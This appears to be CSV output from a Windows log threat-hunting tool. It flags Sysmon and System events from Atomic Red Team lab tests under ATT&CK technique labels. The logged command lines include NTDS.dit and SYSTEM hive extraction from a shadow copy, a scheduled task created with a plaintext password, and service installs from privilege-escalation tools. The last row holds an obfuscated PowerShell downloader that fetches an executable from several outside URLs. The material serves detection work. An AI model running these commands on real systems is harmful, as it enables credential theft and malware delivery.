747F3D96-DA72-5D31-0000-0010044F3F00 1300 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" ),1," 1 5 4 1 0 0x8000000000000000 4099 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:54.080 747F3D96-DA72-5D31-0000-0010044F3F00 1300 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4098 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:53.815 747F3D96-DA71-5D31-0000-00101A463F00 6168 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1," 1 5 4 1 0 0x8000000000000000 4097 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:52.816 747F3D96-DA70-5D31-0000-00100E2C3F00 112 C:\Windows\System32\pcalua.exe 10.0.17763.1 (WinBuild.160101.0800) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation pcalua.exe -a C:\Windows\system32\javacpl.cpl C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 747F3D96-DA70-5D31-0000-001007293F00 608 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" ),1," 1 5 4 1 0 0x8000000000000000 4096 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:52.784 747F3D96-DA70-5D31-0000-001007293F00 608 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a C:\Windows\system32\javacpl.cpl" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1," 1 5 4 1 0 0x8000000000000000 4095 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:50.232 747F3D96-DA6E-5D31-0000-001081F93E00 1284 C:\Windows\System32\pcalua.exe 10.0.17763.1 (WinBuild.160101.0800) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation pcalua.exe -a Java C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 747F3D96-DA6E-5D31-0000-0010D8F63E00 3316 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548270.45384,2019-07-19T18:57:50.453840+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" ),1," 1 5 4 1 0 0x8000000000000000 4094 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:50.198 747F3D96-DA6E-5D31-0000-0010D8F63E00 3316 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a Java" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1202] Indirect Command Execution,1563548270.398446,2019-07-19T18:57:50.398446+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a -c ),1," 1 5 4 1 0 0x8000000000000000 4093 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:47.232 747F3D96-DA6B-5D31-0000-00102DD33E00 5348 C:\Windows\System32\pcalua.exe 10.0.17763.1 (WinBuild.160101.0800) Program Compatibility Assistant Microsoft® Windows® Operating System Microsoft Corporation pcalua.exe -a -c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653 747F3D96-DA6B-5D31-0000-0010CCD03E00 5332 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548267.238555,2019-07-19T18:57:47.238555+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" ),1," 1 5 4 1 0 0x8000000000000000 4092 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:47.195 747F3D96-DA6B-5D31-0000-0010CCD03E00 5332 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "pcalua.exe -a -c" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548267.218345,2019-07-19T18:57:47.218345+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4091 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.915 747F3D96-DA6A-5D31-0000-00104BC83E00 888 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1563548266.92729,2019-07-19T18:57:46.927290+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 ),1," 1 5 4 1 0 0x8000000000000000 4090 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 Persistence - Scheduled Task Management 2019-07-19 14:57:46.845 747F3D96-DA6A-5D31-0000-0010C5C43E00 3352 C:\Windows\System32\schtasks.exe 10.0.17763.1 (WinBuild.160101.0800) Task Scheduler Configuration Tool Microsoft® Windows® Operating System Microsoft Corporation SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 747F3D96-DA6A-5D31-0000-001074C23E00 3872 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563548266.84987,2019-07-19T18:57:46.849870+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" ),1," 1 5 4 1 0 0x8000000000000000 4089 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:57:46.814 747F3D96-DA6A-5D31-0000-001074C23E00 3872 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN " Atomic "task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)",1," 1 5 4 1 0 0x8000000000000000 4135 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:50.383 747F3D96-DDB6-5D31-0000-0010273D4C00 3952 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-0020FF090500 0x509ff 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-D4A4-5D31-0000-0010DD6D0000 804 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," 1 5 4 1 0 0x8000000000000000 4135 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:50.383 747F3D96-DDB6-5D31-0000-0010273D4C00 3952 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-0020FF090500 0x509ff 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-D4A4-5D31-0000-0010DD6D0000 804 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1563549125.755598,2019-07-19T19:12:05.755598+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding )",1," 1 5 4 1 0 0x8000000000000000 4135 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:50.383 747F3D96-DDB6-5D31-0000-0010273D4C00 3952 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-0020FF090500 0x509ff 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-D4A4-5D31-0000-0010DD6D0000 804 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.258254,2019-07-19T19:11:27.258254+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" ),1," 1 5 4 1 0 0x8000000000000000 4133 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.220 747F3D96-DD9F-5D31-0000-001041504B00 6508 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.233257,2019-07-19T19:11:27.233257+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" ),1," 1 5 4 1 0 0x8000000000000000 4132 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.192 747F3D96-DD9F-5D31-0000-00102D4D4B00 976 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.202862,2019-07-19T19:11:27.202862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" ),1," 1 5 4 1 0 0x8000000000000000 4131 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.156 747F3D96-DD9F-5D31-0000-00101A4A4B00 5772 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563549087.169217,2019-07-19T19:11:27.169217+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 4130 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 15:11:27.069 747F3D96-DD9F-5D31-0000-00107B454B00 3344 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-DD47-5D31-0000-001015874900 5840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Service installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Audit,High,"Service installed in the system with Name ( WinPwnage ) , File Name ( %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe ) , Service Type ( user mode service ) , Service Start Type ( demand start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 10446 System IEWIN7 WinPwnage %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe user mode service demand start LocalSystem ",IEWIN7,System cobalt strike service detected installed in the system,1557665564.155703,2019-05-12T16:52:44.155703+04:00,,Threat,Critical,cobalt strike or meterpreter service detected installed in the system,7045," 7045 0 4 0 0 0x8080000000000000 10446 System IEWIN7 WinPwnage %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe user mode service demand start LocalSystem ",IEWIN7,System Service installed in the system,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,"Service installed in the system with Name ( remotesvc ) , File Name ( calc.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 6045 System WIN-77LTAPHIQ1R.example.corp remotesvc calc.exe user mode service auto start LocalSystem ",WIN-77LTAPHIQ1R.example.corp,System System Logs Cleared,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,System Logs Cleared,104," 104 0 4 104 0 0x8000000000000000 27736 System PC01.example.corp user01 EXAMPLE System ",PC01.example.corp,System Service installed in the system,1551605354.168476,2019-03-03T13:29:14.168476+04:00,,Audit,High,"Service installed in the system with Name ( spoolsv ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 4482 System WIN-77LTAPHIQ1R.example.corp spoolsv cmd.exe user mode service auto start LocalSystem ",WIN-77LTAPHIQ1R.example.corp,System Service installed in the system,1551605038.85688,2019-03-03T13:23:58.856880+04:00,,Audit,High,"Service installed in the system with Name ( spoolfool ) , File Name ( cmd.exe ) , Service Type ( user mode service ) , Service Start Type ( auto start ) , Service Account ( LocalSystem )",7045," 7045 0 4 0 0 0x8080000000000000 4480 System WIN-77LTAPHIQ1R.example.corp spoolfool cmd.exe user mode service auto start LocalSystem ",WIN-77LTAPHIQ1R.example.corp,System Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.34971,2020-08-26T09:09:33.349710+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; 